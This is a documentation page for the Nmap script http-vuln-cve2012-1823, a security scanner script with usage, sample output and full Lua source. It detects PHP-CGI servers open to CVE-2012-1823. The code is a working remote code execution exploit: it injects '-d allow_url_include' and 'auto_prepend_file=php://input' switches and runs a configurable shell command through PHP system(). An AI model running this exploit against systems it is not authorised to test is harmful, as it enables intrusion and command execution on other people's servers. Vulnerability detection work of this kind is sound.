<html><head><style>body {font-family: verdana;font-size: 0.7em;} tr {font-family: verdana;font-size: 0.7em;}</style></head><body>
<h3>File http-vuln-cve2012-1823</h3>
<b>Script types:</b> portrule,portrule<br/>
<b>Categories:</b> auth,auth,auth<br/>
<b>Author:</b> Paulino Calderon <calderon@websec.mx>, Paul AMAR <aos.paul@gmail.com><br/>
<b>License:</b> <a href="https://nmap.org/book/man-legal.html" target=_blank>https://nmap.org/book/man-legal.html</a><br/>
<b>Download:</b> <a href="https://svn.nmap.org/nmap/scripts/http-vuln-cve2012-1823.nse">https://svn.nmap.org/nmap/scripts/http-vuln-cve2012-1823.nse</a><br/>
<h3>Summary</h3>
<p>Detects PHP-CGI installations that are vulnerable to CVE-2012-1823, This critical vulnerability allows attackers to retrieve source code and execute code remotely.</p>
<p>The script works by appending "?-s" to the uri to make vulnerable php-cgi handlers return colour syntax highlighted source. We use the pattern "<span style=.*>&lt;?" to detect vulnerable installations.</p>
<h3>Arguments</h3>
<table>
<tr><td>http-vuln-cve2012-1823.uri:</td><td>URI. Default: /index.php</td></tr>
<tr><td>http-vuln-cve2012-1823.cmd:</td><td>CMD. Default: uname -a</td></tr>
<tr><td>slaxml.debug:</td><td>See the documentation for the <a href="nmap/libraries/slaxml.htm">slaxml</a> library</td></tr>
<tr><td>http.host:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.max-body-size:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.max-cache-size:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.pipeline:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.truncated-ok:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.useragent:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>smbdomain:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbhash:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbnoguest:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbpassword:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbtype:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbusername:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>vulns.short:</td><td>See the documentation for the <a href="nmap/libraries/vulns.htm">vulns</a> library</td></tr>
<tr><td>vulns.showall:</td><td>See the documentation for the <a href="nmap/libraries/vulns.htm">vulns</a> library</td></tr>
</table>
<h3>Usage</h3>
<pre>nmap -sV --script http-vuln-cve2012-1823 &lt;target&gt;
nmap -p80 --script http-vuln-cve2012-1823 --script-args http-vuln-cve2012-1823.uri=/test.php &lt;target&gt;</pre>
<h3>Output</h3>
<pre>PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
| http-vuln-cve2012-1823:
|   VULNERABLE:
|   PHP-CGI Remote code execution and source code disclosure
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:2012-1823
|     Description:
|       According to PHP&#39;s website, &quot;PHP is a widely-used general-purpose
|       scripting language that is especially suited for Web development and
|       can be embedded into HTML.&quot; When PHP is used in a CGI-based setup
|       (such as Apache&#39;s mod_cgid), the php-cgi receives a processed query
|       string parameter as command line arguments which allows command-line
|       switches, such as -s, -d or -c to be passed to the php-cgi binary,
|       which can be exploited to disclose source code and obtain arbitrary
|       code execution.
|     Disclosure date: 2012-05-03
|     Extra information:
|       Proof of Concept:/index.php?-s
|     References:
|       http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
|       http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1823
|_      http://ompldr.org/vZGxxaQ</pre>
<h3>Requirements</h3>
<ul>
<li><a href="nmap/libraries/http.htm">http</a></li>
<li><a href="nmap/libraries/shortport.htm">shortport</a></li>
<li><a href="nmap/libraries/stdnse.htm">stdnse</a></li>
<li><a href="nmap/libraries/string.htm">string</a></li>
<li><a href="nmap/libraries/vulns.htm">vulns</a></li>
</ul>
<h3>Code</h3>
<pre>local http = require &quot;http&quot;
local shortport = require &quot;shortport&quot;
local stdnse = require &quot;stdnse&quot;
local string = require &quot;string&quot;
local vulns = require &quot;vulns&quot;

description = [[
Detects PHP-CGI installations that are vulnerable to CVE-2012-1823, This
critical vulnerability allows attackers to retrieve source code and execute
code remotely.

The script works by appending &quot;?-s&quot; to the uri to make vulnerable php-cgi
handlers return colour syntax highlighted source. We use the pattern &quot;&lt;span
style=.*&gt;&amp;lt;?&quot; to detect
vulnerable installations.
]]

---
-- @usage
-- nmap -sV --script http-vuln-cve2012-1823 &lt;target&gt;
-- nmap -p80 --script http-vuln-cve2012-1823 --script-args http-vuln-cve2012-1823.uri=/test.php &lt;target&gt;
-- @output
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- | http-vuln-cve2012-1823:
-- |   VULNERABLE:
-- |   PHP-CGI Remote code execution and source code disclosure
-- |     State: VULNERABLE (Exploitable)
-- |     IDs:  CVE:2012-1823
-- |     Description:
-- |       According to PHP&#39;s website, &quot;PHP is a widely-used general-purpose
-- |       scripting language that is especially suited for Web development and
-- |       can be embedded into HTML.&quot; When PHP is used in a CGI-based setup
-- |       (such as Apache&#39;s mod_cgid), the php-cgi receives a processed query
-- |       string parameter as command line arguments which allows command-line
-- |       switches, such as -s, -d or -c to be passed to the php-cgi binary,
-- |       which can be exploited to disclose source code and obtain arbitrary
-- |       code execution.
-- |     Disclosure date: 2012-05-03
-- |     Extra information:
-- |       Proof of Concept:/index.php?-s
-- |     References:
-- |       http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
-- |       http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1823
-- |_      http://ompldr.org/vZGxxaQ
--
-- @args http-vuln-cve2012-1823.uri URI. Default: /index.php
-- @args http-vuln-cve2012-1823.cmd CMD. Default: uname -a
---

author = {&quot;Paulino Calderon &lt;calderon@websec.mx&gt;&quot;, &quot;Paul AMAR &lt;aos.paul@gmail.com&gt;&quot;}
license = &quot;Same as Nmap--See https://nmap.org/book/man-legal.html&quot;
categories = {&quot;exploit&quot;,&quot;vuln&quot;,&quot;intrusive&quot;}


portrule = shortport.http

action = function(host, port)
  local uri = stdnse.get_script_args(SCRIPT_NAME..&quot;.uri&quot;) or &quot;/&quot;
  local cmd = stdnse.get_script_args(SCRIPT_NAME..&quot;.cmd&quot;) or &quot;uname -a&quot;

  local vuln = {
       title = &#39;PHP-CGI Remote code execution and source code disclosure&#39;,
       state = vulns.STATE.NOT_VULN, -- default
       IDS = {CVE = &#39;2012-1823&#39;},
       description = [[
According to PHP&#39;s website, &quot;PHP is a widely-used general-purpose
scripting language that is especially suited for Web development and
can be embedded into HTML.&quot; When PHP is used in a CGI-based setup
(such as Apache&#39;s mod_cgid), the php-cgi receives a processed query
string parameter as command line arguments which allows command-line
switches, such as -s, -d or -c to be passed to the php-cgi binary,
which can be exploited to disclose source code and obtain arbitrary
code execution.]],
       references = {
          &#39;http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/&#39;,
           &#39;http://ompldr.org/vZGxxaQ&#39;,
       },
       dates = {
           disclosure = {year = &#39;2012&#39;, month = &#39;05&#39;, day = &#39;03&#39;},
       },
     }
  local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)

  stdnse.debug2(&quot;Trying detection using echo command&quot;)
  local detection_session = http.post(host, port, uri..&quot;?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input&quot;, { no_cache = true }, nil, &quot;&lt;?php system(&#39;echo NmapCVEIdentification&#39;);die(); ?&gt;&quot;)
  if detection_session and detection_session.status == 200 then
    if string.match(detection_session.body, &quot;NmapCVEIdentification&quot;) then
      stdnse.debug1(&quot;The website seems vulnerable to CVE-2012-1823.&quot;)
    else
      return
    end
  end

  stdnse.debug2(&quot;Trying Command... &quot; .. cmd)
  local exploitation_session = http.post(host, port, uri..&quot;?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input&quot;, { no_cache = true }, nil, &quot;&lt;?php system(&#39;&quot;..cmd..&quot;&#39;);die(); ?&gt;&quot;)
  if exploitation_session and exploitation_session.status == 200 then
    stdnse.debug1(&quot;Ouput of the command &quot; .. cmd .. &quot; : \n&quot;..exploitation_session.body)
    vuln.state = vulns.STATE.EXPLOIT
    return vuln_report:make_output(exploitation_session.body)
  end
end</pre>
